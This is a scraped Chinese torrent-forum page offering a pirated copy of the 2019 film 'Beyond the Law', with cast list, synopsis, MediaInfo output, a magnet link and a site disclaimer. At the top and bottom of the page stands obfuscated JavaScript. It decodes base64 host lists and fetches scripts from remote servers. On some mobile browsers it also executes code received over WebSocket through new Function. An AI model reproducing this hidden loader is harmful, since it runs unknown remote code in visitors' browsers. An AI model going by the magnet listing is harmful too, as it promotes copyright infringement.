法外之徒[中文字幕].Beyond.the.Law.2019.1080p.FriDay.WEB-DL.H264.AAC 2.31GB

版主小s 26天前 340

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 法外之徒 / 私法捍卫(台)

◎片 名 Beyond the Law

◎年 代 2019

◎产 地 美国

◎类 别 动作 / 犯罪

◎语 言 英语

◎上映日期 2019-12-06(美国)

◎IMDb链接 https://www.imdb.com/title/tt11161374/

◎豆瓣评分 3.6/10 (103人评价)

◎豆瓣链接 https://movie.douban.com/subject/34882905/

◎片 长 89分钟

◎导 演 詹姆斯·库伦·布雷萨克 James Cullen Bressack (id:1457427)

◎编 剧 查德·洛 Chad Law (id:1033654)

Johnny Martin Walters (id:1238135)

◎演 员 约翰尼·梅辛纳 Johnny Messner (id:1000104)

史蒂文·席格 Steven Seagal (id:1002685)

DMX DMX (id:1036560)

比尔·考布斯 Bill Cobbs (id:1019099)

扎克·沃德 Zack Ward (id:1049741)

兰迪·查奇 Randy Charach (id:1445647)

切斯特拉什 ·拉什 Chester Rushing (id:1393587)

西恩·凯南 Sean Kanan (id:1040682)

萨克斯·沙比诺 Saxon Sharbino (id:1329625)

尤利亚·克拉斯 Yulia Klass (id:1376195)

根·加里托 Ken Garito (id:1094412)

帕特里克·基尔帕特里克 Patrick Kilpatrick (id:1025297)

堪萨丝·宝琳 Kansas Skye (id:1186372)

维多利亚·德马尔 Victoria De Mare (id:1327184)

马德琳·韦德 Madeleine Wade (id:1445646)

科迪·蕾尼·卡梅伦 Cody Renee Cameron (id:1436147)

Michael LaRue Simpson Jr. (id:1256075)

Devin Reeve Devin Reeve (id:1033286)

Mitchell L. Johnson Mitchell L. Johnson (id:1395656)

◎标 签 美国 / 复仇 / 动作 / 犯罪 / 2019 / 烂透了 / 大烂片 / 美国电影

◎简 介

法兰克威尔森是位拥有不堪过去的前警察。有天他接获默斯警探的通知,得知自己唯一的儿子被人杀害。原本在乡下过着退隐生活的他,动身回到城市,打算将凶手绳之以法。可是,前帮派分子奥古斯汀诺却想从中阻挠。如今已是生意人的他不喜欢法兰克到处打探的行为,并且愿意不惜一切保护自己的儿子。一场对决就此展开,双方人马绝不善罢甘休,直到其中一人倒下为止。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 163911667188629119160442879355591735976 (0x7B503D2279AE3E0F177435623C463AA8)

  4. Complete name : [email protected]M.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 2.31 GiB

  8. Duration : 1 h 29 min

  9. Overall bit rate : 3 679 kb/s

  10. Encoded date : UTC 2021-11-05 13:55:01

  11. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : AVC

  16. Format/Info : Advanced Video Codec

  17. Format profile : [email protected]

  18. Format settings : CABAC / 1 Ref Frames

  19. Format settings, CABAC : Yes

  20. Format settings, Reference frames : 1 frame

  21. Format settings, GOP : M=1, N=60

  22. Codec ID : V_MPEG4/ISO/AVC

  23. Duration : 1 h 29 min

  24. Bit rate mode : Constant

  25. Bit rate : 3 550 kb/s

  26. Nominal bit rate : 4 000 kb/s

  27. Width : 1 920 pixels

  28. Height : 1 080 pixels

  29. Display aspect ratio : 16:9

  30. Frame rate mode : Constant

  31. Frame rate : 29.970 (30000/1001/53354) FPS

  32. Color space : YUV

  33. Chroma subsampling : 4:2:0

  34. Bit depth : 8 bits

  35. Scan type : Progressive

  36. Bits/(Pixel*Frame) : 0.057

  37. Stream size : 2.23 GiB (97%)

  38. Language : English

  39. Default : Yes

  40. Forced : No


  41. Audio

  42. ID : 2

  43. Format : AAC LC

  44. Format/Info : Advanced Audio Codec Low Complexity

  45. Codec ID : A_AAC-2

  46. Duration : 1 h 29 min

  47. Bit rate : 125 kb/s

  48. Channel(s) : 2 channels

  49. Channel layout : L R

  50. Sampling rate : 48.0 kHz

  51. Frame rate : 46.875 FPS (1024 SPF)

  52. Compression mode : Lossy

  53. Stream size : 80.5 MiB (3%)

  54. Title : English

  55. Language : English

  56. Default : Yes

  57. Forced : No


  58. Text #1

  59. ID : 3

  60. Format : UTF-8

  61. Codec ID : S_TEXT/UTF8

  62. Codec ID/Info : UTF-8 Plain Text

  63. Duration : 1 h 23 min

  64. Bit rate : 29 b/s

  65. Count of elements : 969

  66. Stream size : 18.0 KiB (0%)

  67. Title : Chinese Simplified

  68. Language : Chinese

  69. Default : Yes

  70. Forced : No


  71. Text #2

  72. ID : 4

  73. Format : UTF-8

  74. Codec ID : S_TEXT/UTF8

  75. Codec ID/Info : UTF-8 Plain Text

  76. Duration : 1 h 23 min

  77. Bit rate : 29 b/s

  78. Count of elements : 969

  79. Stream size : 18.0 KiB (0%)

  80. Title : Chinese Traditional

  81. Language : Chinese

  82. Default : No

  83. Forced : No




复制代码


TAGS 动作 犯罪

磁力链:
  • magnet:?xt=urn:btih:AA60E8C6634393076028F35DC42F36B2B706E8E6

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};